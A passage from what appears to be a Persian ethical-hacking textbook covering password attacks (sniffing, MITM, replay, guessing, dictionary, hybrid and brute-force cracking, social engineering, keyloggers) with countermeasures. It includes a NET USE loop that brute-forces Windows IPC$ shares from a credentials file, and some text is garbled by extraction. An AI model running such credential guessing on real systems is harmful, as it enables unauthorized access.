ﺣﻤﻠﻪ passive online ، ﺑﺎ ﻧﺎم اﺳﺘﺮاق ﺳﻤﻊ ﭘﺴﻮرد روي ﺷﺒﻜﻪ ﻫﺎي ﻛﺎﺑﻠﻲ و واﻳﺮﻟﺲ ﺷﻨﺎﺧﺘﻪ ﻣﻲ ﺷﻮد . ﻛﺎرﺑﺮ ﻧﻬﺎﻳﻲ ﻧﻤﻲ ﺗﻮاﻧﺪ اﻳﻦ ﮔﻮﻧﻪ ﺣﻤﻼت را ﺗﺸﺨﻴﺺ دﻫﺪ . در ﻃﻮل ﻓﺮاﻳﻨﺪ اﺣﺮاز ﻫﻮﻳﺖ، ﭘﺴﻮرد ﺑﺪﺳﺖ ﻣﻲ آﻳﺪ و ﺑﺎ ﻓﺎﻳﻞ دﻳﻜﺸﻨﺮي ﻳﺎ ﻟﻴﺴﺖ ﻛﻠﻤﺎت ﻣﻘﺎﻳﺴﻪ ﻣﻲ ﺷﻮد . ﻣﻌﻤﻮﻻ ﭘﺴﻮردﻫﺎي ﺣﺴﺎب ﻫﺎي ﻛﺎرﺑﺮان، در زﻣﺎن ارﺳﺎل روي ﺷﺒﻜﻪ hash و ﻳﺎ رﻣﺰ ﻣﻲ ﺷﻮﻧﺪ ﺗﺎ ﺟﻠﻮي دﺳﺘﺮﺳﻲ ﻏﻴﺮ ﻣﺠﺎز را ﺑﮕﻴﺮ .ﺪﻧ اﮔﺮ ﭘﺴﻮرد ﺗﻮﺳﻂ رﻣﺰﮔﺬاري ﻳﺎ hashing ، ﻣﺤﺎﻓﻈﺖ ﺷﺪه ﺑﺎﺷﺪ، آﻧﮕﺎه اﺑﺰارﻫﺎي ﻣﺨﺼﻮﺻﻲ ﻛﻪ در toolkit ﻫﻜﺮ وﺟﻮد دارد ﺑﺮاي ﺷﻜﺴﺘﻦ اﻟﮕﻮرﻳﺘﻢ ﻣﻲ ﺗﻮاﻧﺪ ﻣﻮرد اﺳﺘﻔﺎده ﻗﺮار ﮔﻴﺮد . .

71

ﺣﻤﻠﻪ دﻳﮕﺮ passive online ، ﺑﻨﺎم MITM ) man-in-the0-middle ) ﻧﺎم دارد . در ﺣﻤﻠﻪ MITM ، ﻫﻜﺮ در درﺧﻮاﺳﺖ اﺣﺮاز ﻫﻮﻳﺖ دﺧﺎﻟﺖ ﻣﻲ ﻛﻨﺪ و آن را ﺑﻪ ﺳﺮور ﻓﺮوارد ﻣﻲ ﻛﻨﺪ . ﺑﺎ وارد ﻛﺮدن ﻳﻚ sniffer ﺑﻴﻦ ﻛﻼﻳﻨﺖ و ﺳﺮور، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﻫﻢ ارﺗﺒﺎﻃﺎت را sniff ﻛﻨﺪ و ﻫﻢ ﭘﺴﻮرد را در اﻳﻦ ﻓﺮآﻳﻨﺪ ﺑﺪﺳﺖ آورد . .

ﺣﻤﻠﻪ reply ، ﻧﻴﺰ ﺟﺰ ﺣﻤﻼت passive online اﺳﺖ ﻛﻪ زﻣﺎﻧﻴﻜﻪ ﭘﺴﻮرد ﺑﻪ ﺳﺮور اﺣﺮا ز ﻫﻮﻳﺖ ارﺳﺎل ﻣﻲ ﺷﻮد ﺑﺎ ﻣﺪاﺧﻠﻪ ﻫﻜﺮ رخ ﻣﻲ دﻫﺪ و ﺳﭙﺲ آن را دوﺑﺎره ﺑﺮاي اﺣﺮاز ﻫﻮﻳﺖ ﻫﺎي ﺑﻌﺪي ارﺳﺎل ﻣﻲ ﻛﻨﺪ . در اﻳﻦ روش، ﻫﻜﺮ ﻧﻴﺎزي ﻧﺪارد ﻛﻪ ﭘﺴﻮرد را ﺑﺸﻜﻨﺪ ﻳﺎ از ﻃﺮﻳﻖ MITM آن را ﻳﺎد ﺑﮕﻴﺮد ﺑﻠﻜﻪ ﺑﺎﻳﺪ آن را ﺑﺪﺳﺖ آورد و از ﺑﺴﺘﻪ ﻫﺎي اﺣﺮاز ﻫﻮﻳﺖ- ﭘﺴﻮرد ﺑﺮاي اﺣﺮاز ﻫﻮﻳﺖ ﻫﺎي ﺑﻌﺪي اﺳﺘﻔﺎده ﻛﻨﺪ . .

ﺣﻤﻼت Active Online

ﺳﺎده ﺗﺮﻳﻦ ر وش ﺑﺮاي دﺳﺘﺮﺳﻲ در ﺳﻄﺢ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ، ﺣﺪس زدن ﻳﻚ ﭘﺴﻮرد ﺳﺎده اﺳﺖ ﺑﺎ اﻳﻦ ﻓﺮض ﻛﻪ ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ، از ﻳﻚ ﭘﺴﻮرد ﺳﺎده اﺳﺘﻔﺎده ﻛﺮده اﺳﺖ . ﺣﺪس ﭘﺴﻮرد، ﻳﻚ ﻧﻮع ﺣﻤﻠﻪ active online اﺳﺖ ﻛﻪ ﺑﺮ ﻣﺒﻨﺎي ﻓﺎﻛﺘﻮر اﻧﺴﺎﻧﻲ در اﻳﺠﺎد ﭘﺴﻮرد اﺳﺖ و ﺗﻨﻬﺎ ﺑﺮ روي ﭘﺴﻮردﻫﺎي ﺿﻌﻴﻒ ﻛﺎر ﻣﻲ ﻛﻨﺪ . .

ﻓﺮض ﻛﻨﻴﺪ ﻛﻪ ﭘﻮرت NetBOIS TCP 139 ﺑﺎز اﺳﺖ، ﻣﻮﺛﺮﺗﺮﻳﻦ روش ﺑﺮاي ﺷﻜﺴﺘﻦ ﭘﺴﻮرد در ﺳﻴﺴﺘﻢ ﻫﺎي وﻳﻨﺪوز 2000 و NT ، ﺣﺪس زدن ﭘﺴﻮرد اﺳﺖ . اﻳﻦ ﻋﻤﻞ ﺑﺎ اﺗﺼﺎل ﺑﻪ ﭘﻮﺷﻪ ﺑﻪ اﺷﺘﺮاك ﮔﺬاﺷﺘﻪ ﺷﺪه ( $IPC ﻳﺎ $C ) و ) ﺗﻼش ﺑﺮاي ﺗﺮﻛﻴﺒﻲ از ﻧﺎم ﻛﺎرﺑﺮي و ﭘﺴﻮرد اﺳﺖ . راﻳﺞ ﺗﺮﻳﻦ ﻧﺎم ﻛﺎرﺑﺮي ﺑﺮاي ﻣﺪﻳﺮ ﺳﻴﺴﺘﻢ، Administrator ، Admin ، Sysadmin اﺳﺖ . .

ﻫﻜﺮ اﺑﺘﺪا ﺳﻌﻲ ﻣﻲ ﻛﻨﺪ ﻛﻪ ﺑﻪ ﭘﻮﺷﻪ ﻫﺎﻳﻲ ﻛﻪ ﺑﺼﻮرت ﭘﻴﺶ ﻓﺮض ﺑﻪ اﺷﺘﺮاك ﮔﺬاﺷﺘﻪ ﺷﺪه اﺳﺖ، وﺻﻞ ﺷﻮد . ﺑﺮاي اﺗﺼﺎل ﺑﻪ ﭘﻮﺷﻪ ﻫﺎي ﺑﻪ اﺷﺘﺮاك ﮔﺬ اﺷﺘﻪ ﻣﺨﻔﻲ دراﻳﻮ C ، از دﺳﺘﻮر زﻳﺮ اﺳﺘﻔﺎده ﻛﻨﻴﺪ : :

\\ip_address\c$

72

ﺑﺮﻧﺎﻣﻪ ﻫﺎﻳﻲ وﺟﻮد دارﻧﺪ ﻛﻪ ﺑﺼﻮرت اﺗﻮﻣﺎﺗﻴﻚ ﻓﺎﻳﻞﻫﺎي دﻳﻜﺸﻨﺮي، ﻟﻴﺴﺖ ﻛﻠﻤﺎت ﻳﺎ ﺗﺮﻛﻴﺒﻲ از ﺣﺮوف، اﻋﺪاد و ﻛﺎراﻛﺘﺮﻫﺎي ﺧﺎص ﺗﻮﻟﻴﺪ ﻣﻲ ﻛﻨﻨﺪ و ﺗﻼش ﻣﻲ ﻛﻨﻨﺪ ﺗﺎ ﺑﻪ ﺳﻴﺴﺘﻢ وﺻﻞ ﺷﻮﻧﺪ . اﻏﻠﺐ ﺳﻴﺴﺘﻢ ﻫﺎ، ﺑﺎ اﺳﺘﻔﺎده از ﺗﻨﻈﻴﻢ ﺣﺪاﻛﺜﺮ ﺗﻌﺪاد ﺗﻼش ﺑﺮاي اﺗﺼﺎل ﺑﻪ ﺳﻴﺴﺘﻢ، از اﻳﻦ ﻧﻮع ﺣﻤﻠﻪ ﭘﻴﺸﮕﻴﺮي ﻣﻲ ﻛﻨﻨﺪ . .

ﺣﺪس ﭘﺴﻮرد ﺑﻪ ﺻﻮرت اﺗﻮﻣﺎﺗﻴﻚ

ﺑﺮاي ﺗﺴﺮﻳﻊ ﺑﺨﺸﺪﻳﻦ ﺑﻪ ﻋﻤﻠﻴﺎت ﺣﺪس ﭘﺴﻮرد، ﻫﻜﺮﻫﺎ از اﺑﺰارﻫﺎي اﺗﻮﻣﺎﺗﻴﻚ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . ﻳﻚ ﻓﺮآﻳﻨﺪ ﺳﺎده ﺑﺮاي ﺧﻮدﻛﺎرﺳﺎزي ﺣﺪس ﭘﺴﻮرد، اﺳﺘﻔﺎده از اﺑﺰار دﺳﺘﻮري Windows shell اﺳﺖ ﻛﻪ ﻣﺒﺘﻨﻲ ﺑﺮ اﺳﺘﺎﻧﺪارد NET USE اﺳﺖ . ﺑﺮاي ﺳﺎﺧﺖ ﻳﻚ اﺳﻜﺮﻳﭙﺖ ﺳﺎده ﺣﺪس ﭘﺴﻮرد، ﻣﺮاﺣﻞ زﻳﺮ را اﻧﺠﺎم دﻫﻴﺪ : :

.1 ﺑﺎ اﺳﺘﻔﺎده از ﺑﺮﻧﺎﻣﻪ Windows Notepad ، ﻳﻚ ﻓﺎﻳﻞ username و password ﺳﺎده ﺑﺴﺎزﻳﺪ . اﺑﺰارﻫﺎي ﺧﻮدﻛﺎري از ﻗﺒﻴﻞ Dictionary Generator ، ﺑﺮاي ﺳﺎﺧﺖ ﻟﻴﺴﺖ اﻳﻦ ﻛﻠﻤﺎت ﺟو دﻮ ﺪﻧراد . ﻓﺎﻳﻞ را در ﻣﺴﻴﺮ C: drive as credentials.txt ذﺧﻴﺮه ﻛﻨﻴﺪ. .2 اﻳﻦ ﻓﺎﻳﻞ را ﺑﺎ اﺳﺘﻔﺎده از دﺳﺘﻮر pipe ، FOR ﻛﻨﻴﺪ: C:\> FOR /F “token=1, 2*” %i in (credentials.txt) .3 دﺳﺘﻮر net use \\targetIP\IPC$ %i /u: %j را ﺗﺎﻳﭗ ﻛﻨﻴﺪ ﺗﺎ از ﻓﺎﻳﻞ credentials.txt اﺳﺘﻔﺎده ﻛﻨﺪ و ﺑﻪ ﭘﻮﺷﻪ share ﺷﺪه ﻣﺨﻔﻲ آن وارد ﺷﻮد.

ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺣﺪس ﭘﺴﻮرد

ﺑﺮاي ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺣﺪس و ﺣﻤﻼت ﭘﺴﻮرد، دو ﮔﺰﻳﻨﻪ وﺟﻮد دارد . ﻛﺎرت ﻫﺎي ﻫﻮﺷﻤﻨﺪ و ﺑﻴﻮﻣﺘﺮﻳﻚ، ﻳﻚ ﻻﻳﻪ اﻣﻨﻴﺘﻲ اﺿﺎﻓﻪ ﻣﻲ ﻛﻨﻨﺪ . ﻣﻤﻜﻦ اﺳﺖ ﻛﺎرﺑﺮي ﺑﺎ اﺳﺘﻔﺎده از ﺑﻴﻮﻣﺘﺮﻳﻚ، اﺣﺮاز ﻫﻮﻳﺖ و ﺷﻨﺎﺳﺎﻳﻲ ﺷﻮد . ﺑﻴﻮﻣﺘﺮﻳﻚ ﻫﺎ از وﻳﮋﮔﻲ ﻫﺎي ﻓﻴﺰﻳﻜﻲ ﻫﻤﭽﻮن اﺛﺮ اﻧﮕﺸﺖ، اﺳﻜﻦ ﻛﻒ دﺳﺖ، و اﺳﻜﻦ ﻗﺮﻧﻴﻪ ﭼﺸﻢ ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﻛﺎرﺑﺮان اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . .

ﻛﺎرت ﻫﺎي ﻫﻮﺷﻤﻨﺪ و دﺳﺘﮕﺎه ﻫﺎي ﺑﻴﻮﻣﺘﺮﻳﻚ، از دو ﻓﺎﻛﺘﻮر ﺑﺮاي اﺣﺮاز ﻫﻮﻳﺖ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ ﻛﻪ ﻫﻨﮕﺎم ﺷﻨﺎﺳﺎﻳﻲ ﻛﺎرﺑﺮ، ﺑﻪ دو ﻧﻮع ﺷﻨﺎﺳﺎﻳﻲ ﻧﻴﺎز دارﻧﺪ ( ﻣﺜﻼ ﻛﺎرت ﻫﻮﺷﻤﻨﺪ و ﭘﺴﻮرد ). ﺑﺎ درﺧﻮاﺳﺖ ﭼﻴﺰي ﻛﻪ ﻛﺎرﺑﺮ ﺑﺼﻮرت ﻓﻴﺰﻳﻜﻲ آن را دارد ( ﻣﺜﻼ ﻛﺎرت ﻫﻮﺷﻤﻨﺪ ) و ﭼﻴﺰي ﻛﻪ ﻣﻲ داﻧﺪ ( ﭘﺴﻮردﺷﺎن) ، اﻣﻨﻴﺖ اﻓﺰاﻳﺶ ﻣﻲ ﻳﺎﺑﺪ و ﻓﺮآﻳﻨﺪ اﺣﺮاز ﻫﻮﻳﺖ در ﻣﻘﺎﺑﻞ ﺣﻤﻼت ﭘﺴﻮرد، ﻣﻘﺎوم ﻣﻲ ﺷﻮد . .

73

ﺣﻤﻼت آﻓﻼﻳﻦ

ﺣﻤﻼت آﻓﻼﻳﻦ از ﻣﺤﻠﻲ ﺑﻪ ﻏﻴﺮ از ﺟﺎﺋﻴﻜﻪ ﻛﺎﻣﭙﻴﻮﺗﺮ واﻗﻌﻲ ﻗﺮار دارد اﻧﺠﺎم ﻣﻲ ﺷﻮد . ﻣﻌﻤﻮﻻ ﺣﻤﻼت آﻓﻼﻳﻦ ﻧﻴﺎز ﺑﻪ دﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﺑﻪ ﻛﺎﻣﭙﻴﻮﺗﺮ و ﻛﭙﻲ ﻓﺎﻳﻞ ﭘﺴﻮرد از ﺳﻴﺴﺘﻢ ﺑﻪ ﺣﺎﻓﻈﻪ ﺟﺎﻧﺒﻲ دارد . ﺳﭙﺲ ﻫﻜﺮ آن ﻓﺎﻳﻞ را ﺑﻪ ﻛﺎﻣﭙﻴﻮﺗﺮ دﻳﮕﺮي ﻛﭙﻲ ﻣﻲ ﻛﻨﺪ ﺗﺎ آن را ﺑﺸ ﻜﻨﺪ . اﻧﻮاع ﻣﺨﺘﻠﻒ از ﺣﻤﻼت آﻓﻼﻳﻦ ﭘﺴﻮرد وﺟﻮد دارد . ﺟﺪول زﻳﺮ ﻫﺮ ﻛﺪام از اﻳﻦ ﺣﻤﻼت را ﺗﻮﺿﻴﺢ ﻣﻲ دﻫﺪ : :

ﻧﻮع ﺣﻤﻠﻪ وﻳﮋﮔﻲ ﻫﺎ ﻣﺜﺎل

Dictionary attack ﭘﺴﻮردﻫﺎ را از ﻟﻴﺴﺖ ﻛﻠﻤﺎت دﻳﻜﺸﻨﺮي اﺳﺘﻔﺎده ﻛﻨﺪ Administrator Hybrid attack ﺑﺮﺧﻲ از ﻋﻼﺋﻢ را ﺑﺎ ﻛﺎراﻛﺘﺮﻫﺎي ﭘﺴﻮرد ﺟﺎﻳﮕﺰﻳﻦ ﻣﻲ ﻛﻨﺪ Adm1n1strator Brute-force attack ﺗﻤﺎم ﺗﺮﻛﻴﺒﺎت ﻣﻤﻜﻦ از ﺣﺮوف، اﻋﺪاد، و ﻛﺎراﻛﺘﺮﻫﺎي ﺧﺎص را ﺗﺴﺖ ﻣﻲ ﻛﻨﺪ Ms!tr245@F5a

ﺣﻤﻠﻪ دﻳﻜﺸﻨﺮي، ﺳﺎده ﺗﺮﻳﻦ و ﺳﺮﻳﻌﺘﺮﻳﻦ ﻧﻮع ﺣﻤﻠﻪ اﺳﺖ . ﺑﺮاي ﺷﻨﺎﺳﺎﻳﻲ ﭘﺴﻮردي ﻛﻪ در دﻳﻜﺸﻨﺮي اﺳﺖ اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . ﻣﻌﻤﻮﻻ، ﻫﻜﺮ از ﻳﻚ ﻓﺎﻳﻞ ﻛﻪ ﺣﺎوي ﺗﻤﺎم ﻛﻠﻤﺎت دﻳﻜﺸﻨﺮي و hash آن ﻛﻠﻤﺎت ﺑﺎ اﺳﺘﻔﺎده از ﻫﻤﺎن اﻟﮕﻮرﻳﺘﻢ اﺳﺖ، اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . ﺳﭙﺲ، ﻛﻠﻤﺎت دﻳﻜﺸﻨﺮي ﻛﻪ hash ﺷﺪه اﻧﺪ، ﺑﺎ ﭘﺴﻮردﻫﺎي hash ﺷﺪه در ﻣﺮﺣﻠﻪ ﻻﮔﻴﻦ، ﻣﻘﺎﻳﺴﻪ ﻣﻲ ﺪﻧﺷﻮ . ﺣﻤﻠﻪ دﻳﻜﺸﻨﺮي، ﺗﻨﻬﺎ زﻣﺎﻧﻴﻜﻪ ﭘﺴﻮرد ﻳﻜﻲ از ﻛﻠﻤﺎت دﻳﻜﺸﻨﺮ ي ﺑﺎﺷﺪ ﻛﺎر ﻣﻲ ﻛﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ، اﻳﻦ ﻧﻮع ﺣﻤﻠﻪ، ﻫﻤﺎن ﻣﺤﺪودﻳﺖ ﻫﺎ را دارد ﻳﻌﻨﻲ اﮔﺮ ﭘﺴﻮرد ﻗﻮي اﻧﺘﺨﺎب ﺷﺪه ﺑﺎﺷﺪ، ﻛﺎر ﻧﻤﻲ ﻛﻨﺪ . اﮔﺮ ﻫﻜﺮ ﻧﺘﻮاﻧﺪ ﺑﺎ اﺳﺘﻔﺎده از ﺣﻤﻠﻪ دﻳﻜﺸﻨﺮي، ﭘﺴﻮرد را ﭘﻴﺪا ﻛﻨﺪ، در ﻣﺮﺣﻠﻪ ﺑﻌﺪي از ﺣﻤﻠﻪ hybrid اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . اﻳﻦ ﺣﻤﻠﻪ، ﺑﺎ ﻳﻚ ﻓﺎﻳﻞ دﻳﻜﺸﻨﺮي ﻛﻪ ﺑﺮ ﺧﻲ از ﺣﺮوف آن ﺑﺎ ﻋﻼﺋﻢ ﺟﺎﻳﮕﺰﻳﻦ ﺷﺪه اﺳﺖ، ﺷﺮوع ﻣﻲ ﺷﻮد . ﺑﺮاي ﻣﺜﺎل، ﺑﺴﻴﺎري از ﻛﺎرﺑﺮان، ﺑﻪ آﺧﺮ ﭘﺴﻮردﻫﺎﻳﺸﺎن، ﻋﺪد 1 را اﺿﺎﻓﻪ ﻣﻲ ﻛﻨﻨﺪ ﺗﺎ ﭘﺴﻮردﺷﺎن ﻗﻮي ﺷﻮد . .

زﻣﺎن ﮔﻴﺮﺗﺮﻳﻦ ﻧﻮع ﺣﻤﻠﻪ، ﺣﻤﻠﻪ brute-force اﺳﺖ ﻛﻪ ﺗﻤﺎم ﺣﺎﻻت ﻣﺨﺘﻠﻒ را ﺴﺗ ﺖ ﻣﻲ ﻛﻨﺪ . ﺣﻤﻠﻪ -brute force ، آﻫﺴﺘﻪ ﺗﺮﻳﻦ ﻧﻮع ﺣﻤﻠﻪ اﺳﺖ ﺑﺮاي اﻳﻨﻜﻪ ﺗﻤﺎم ﺗﺮﻛﻴﺒﺎت ﻣﻤﻜﻦ ﺣﺮوف، اﻋﺪاد، و ﻋﻼﺋﻢ را ﺑﺮرﺳﻲ ﻣﻲ ﻛﻨﺪ . ﺑﺎ اﻳﻦ ﺣﺎل، ﻣﻮﺛﺮﺗﺮﻳﻦ اﺳﺖ ﺑﺮاي اﻳﻨﻜﻪ اﮔﺮ زﻣﺎن ﻛﺎﻓﻲ وﺟﻮد داﺷﺘﻪ ﺑﺎﺷﺪ، ﺗﻤﺎم ﭘﺴﻮردﻫﺎ ﻛﺸﻒ ﻣﻲ ﺷﻮﻧﺪ . .

74

Pre-Computed Hashes

ﺗﻤﺎم ﻛﻠﻤﺎت را از ﻗﺒﻞ hash ﻣﻲ ﻛﻨﺪ و در ﭘﺎﻳﮕﺎه داده ذﺧﻴﺮه ﻣﻲ ﻨﻛ ﺪ و در زﻣﺎن ﺷﻜﺴﺘﻦ ﭘﺴﻮرد، از اﻳﻦ ﭘﺎﻳﮕﺎه داده ﺑﺮاي ﭘﻴﺪا ﻛﺮدن ﭘﺴﻮرد اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . ذﺧﻴﺮه ﻛﺮدن hash ، ﻧﻴﺎز ﺑﻪ ﻓﻀﺎي ﺣﺎﻓﻈﻪ زﻳﺎدي دارد و زﻣﺎن دﺎﻳز ي ار ار ﻣ ﻲ .دﺮﻴﮔ .دﺮﻴﮔ ﻲ

ﺣﻤﻼت Nonelectronic

ﺣﻤﻼت ﻏﻴﺮ اﻟﻜﺘﺮوﻧﻴﻜﻲ ﻳﺎ ﻏﻴﺮ ﻓﻨﻲ ، ﺣﻤﻼﺗﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ا ز ﻫﻴﭻ داﻧﺶ ﻓﻨﻲ اﺳﺘﻔﺎده ﻧﻤﻲ ﻛﻨﻨﺪ . اﻳﻦ ﻧﻮع ﺣﻤﻠﻪ، ﺷﺎﻣﻞ ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎع، sniff ، shoulder surfing ﻛﺮدن ﻛﻴﺒﻮرد، و آﺷﻐﺎل ﮔﺮدي اﺳﺖ . .

ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ، ﻫﻨﺮ ﺗﻌﺎﻣﻞ ﺑﺎ ﻣﺮدم ﻳﺎ ﺑﻪ ﺻﻮرت رو در رو ﻳﺎ ﺗﻠﻔﻨﻲ ﺑﺮاي ﺟﻤﻊ آوري اﻃﻼﻋﺎت ﺑﺎ ارزﺷﻲ ﻫﻤﭽﻮن ﭘﺴﻮردﻫﺎ اﺳﺖ . ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ، ﺑﺮ ﻣﺒﻨﺎي ذات ﺧﻮب ﻣﺮدم ﻛﻪ دوﺳﺖ دارﻧﺪ ﺑﻪ ﺑﻘﻴﻪ ﻛﻤﻚ ﻛﻨﻨﺪ ، اﺳﺘﻮار اﺳﺖ . اﻏﻠﺐ اوﻗﺎت، help desk ﻫﺎ ﺳﻮژه ﺧﻮﺑﻲ ﺑﺮاي ﻣﻬﻨﺪﺳﻲ اﺟﺘﻤﺎﻋﻲ ﻫﺴﺘﻨﺪ ﺑﺮاي اﻳﻨﻜﻪ وﻇﻴﻔﻪ آﻧﻬﺎ ﻛﻤﻚ ﺑﻪ دﻳﮕﺮان اﺳﺖ و ﭘﺎك ﻛﺮدن ﻳﺎ ﺴﻳر ﺖ ﻛﺮدن ﭘﺴﻮرد، ﺟﺰﺋﻲ از وﻇﺎﻳﻒ دﺎﻋ ي آﻧﻬﺎﺳﺖ . ﺑﻬﺘﺮﻳﻦ روش ﻣﻘﺎﺑﻠﻪ ﺑﺎ اﻳﻦ ﻧﻮع ﺣﻤﻠﻪ ، آﻣﻮزش آﮔﺎﻫﻲ اﻣﻨﻴﺘﻲ ﺑﺮاي ﻫﻤﻪ ﻛﺎرﻛﻨﺎن و ﻓﺮآﻳﻨﺪﻫﺎي اﻣﻨﻴﺘﻲ ﺑﺮاي ﺴﻳر ﺖ ﻛﺮدن ﭘﺴﻮرد اﺳﺖ . .

Shoulder surfing ، اﻳﺴﺘﺎدن در ﻛﻨﺎر ﺷﺨﺺ و ﻧﮕﺎه ﻛﺮدن ﺑﻪ ﭘﺴﻮردي اﺳﺖ ﻛﻪ ﺗﺎﻳﭗ ﻣﻲ ﻛﻨﺪ . زﻣﺎﻧﻴﻜﻪ ﻫﻜﺮ ﻧﺰدﻳﻚ ﻛﺎرﺑﺮ ﻳﺎ ﺳﻴﺴﺘﻢ اﺳﺖ، اﻳﻦ روش ﻣﻮﺛﺮ اﺳﺖ . ﺑﻌﻀﻲ ﺻﻔﺤﺎت وﺟﻮد دارﻧﺪ ﻛﻪ ﻧﮕﺎه ﻛﺮدن ا ز ﮔﻮﺷﻪ ﺑﻪ ﻣﺎﻧﻴﺘﻮر را ﺳﺨﺖ ﻣﻲ ﻛﻨﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ، ﺟﻠﻮي اﻳﻦ ﺣﻤﻠﻪ را ﻣﻲ ﮔﻴﺮﻧﺪ . ﻋﻼوه ﺑﺮ اﻳﻦ، آﻣﻮزش و آﮔﺎﻫﻲ ﭘﺮﺳﻨﻞ، اﺣﺘﻤﺎل اﻳﻦ ﻧﻮع ﺣﻤﻠﻪ را ﻛﺎﻫﺶ ﻣﻲ دﻫﺪ . .

در آﺷﻐﺎل ﮔﺮدي، ﻫﻜﺮ در زﺑﺎﻟﻪ ﻫﺎ ﺑﻪ دﻧﺒﺎل اﻃﻼﻋﺎﺗﻲ از ﻗﺒﻴﻞ ﭘﺴﻮردﻫﺎﻳﻲ ﻛﻪ ﻣﻤﻜﻦ اﺳﺖ در ﺗﻜﻪ اي ﻛﺎﻏﺬ ﻧﻮﺷﺘﻪ ﺷﻮد ﻣﻲ ﮔﺮدد . ﺑﺮاي ﻣﻘﺎﺑﻠﻪ ﺑﺎ اﻳﻦ ﺣﻤﻠﻪ ﻧﻴﺰ آﻣﻮزش و آﮔﺎﻫﻲ ﻛﺎرﺑﺮان ﻣﻲ ﺗﻮاﻧﺪ ﻫﻜﺮ را از ﻛﺴﺐ اﻃﻼﻋﺎت ﭘﺴﻮردﻫﺎ ﺑﺎ آﺷﻐﺎل ﮔﺮدي ﺟﻠﻮﮔﻴﺮي ﻛﻨﺪ . .

75

وب ﺳﺎﻳﺖ ﻫﺎﻳﻲ وﺟﻮد دارﻧﺪ ﻛﻪ ﺷﺎﻣﻞ ﭘﺎﻳﮕﺎه داده ﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﭘﺴﻮردﻫﺎي ﭘﻴﺶ ﻓﺮض ﺑﺴﻴﺎري از ﺳﺎزﻧﺪﮔﺎن ﻣﺨﺘﻠﻒ را دارﻧﺪ : :

http://www.defaultpassword.com

http://www.cirt.net/passwords

http://www.virus.org/default-password

ﻧﺮم اﻓﺰارﻫﺎي PDF Password Cracker ، و Abcom PDF Password Cracker ، ﻗﻔﻞ ﻫﺎي اﻣﻨﻴﺘﻲ ﻓﺎﻳﻞ ﻫﺎي PDF را ﻣﻲ ﺷﻜﻨﺪ . .

ﺗﻜﻨﻴﻚ ﻫﺎي keylogger ﻫﺎ و spyware

اﮔﺮ ﻫﻤﻪ ﺗﻼش ﻫﺎ ﺑﺮاي ﺟﻤﻊ آوري ﭘﺴﻮرد، ﺑﻪ ﺷﻜﺴﺖ ﻣﻨﺠﺮ ﺷﻮد، اﺳﺘﻔﺎده از اﺑﺰار keystroke logger ، اﻧﺘﺨﺎب ﺑﻌﺪي ﻫﻜﺮﻫﺎﺳﺖ . keylogger ) keystroke logger) ، ﻣﻲ ﺗﻮاﻧﺪ ﺑﺼﻮرت ﺳﺨﺖ اﻓﺰاري ﻳﺎ ﻧﺮم اﻓﺰاري اﻧﺠﺎم ﮔﻴﺮد . keystroke logger ﻫﺎي ﺳﺨﺖ اﻓﺰاري، دﺳﺘﮕﺎه ﻫﺎي ﺳﺨﺖ اﻓﺰاري ﻛﻮﭼﻜﻲ ﻫﺴﺘﻨﺪ ﻛﻪ ﺻﻔﺤ ﻪ ﺪﻴﻠﻛ را ﺑﻪ ﻛﺎﻣﭙﻴﻮﺗﺮ وﺻﻞ ﻣﻲ ﻛﻨﻨﺪ و ﻫﺮ ﻛﻠﻴﺪي ﻛﻪ ﻓﺸﺎر داده ﻣﻲ ﺷﻮد را داﺧﻞ ﻓﺎﻳﻠﻲ در ﺣﺎﻓﻈﻪ ذﺧﻴﺮه ﻣﻲ ﻛﻨﻨﺪ . ﺑﺮاي ﻧﺼﺐ ﻳﻚ keylogger ﺳﺨﺖ اﻓﺰاري، ﻫﻜﺮ ﺑﺎﻳﺪ دﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﺑﻪ ﺳﻴﺴﺘﻢ داﺷﺘﻪ ﺑﺎﺷﺪ . .

Keylogger ﻧﺮم اﻓﺰاري ، ﺗﻜﻪ اي از ﻧﺮم اﻓﺰار ﺳ ﻗﺮ ﺖ اﺳﺖ ﻛﻪ ﺑﻴﻦ ﺳﺨﺖ اﻓﺰار ﺻﻔﺤ ﻪ ﺪﻴﻠﻛ و ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻗﺮار ﻣﻲ ﮔﻴﺮد ﺑﻨﺎﺑﺮاﻳﻦ، ﻣﻲ ﺗﻮاﻧﻨﺪ ﻫﺮ ﺿ ﻪﺑﺮ ﻛﻠﻴﺪ را ﺛﺒﺖ ﻛﻨﻨﺪ . Keylogger ﻫﺎي ﻧﺮم اﻓﺰاري ﺗﻮﺳﻂ ﺗﺮوﺟﺎن ﻫﺎ ﻳﺎ وﻳﺮوس ﻫﺎ ﺗﻮﺳﻌﻪ ﻣﻲ ﻳﺎﺑﻨﺪ . .

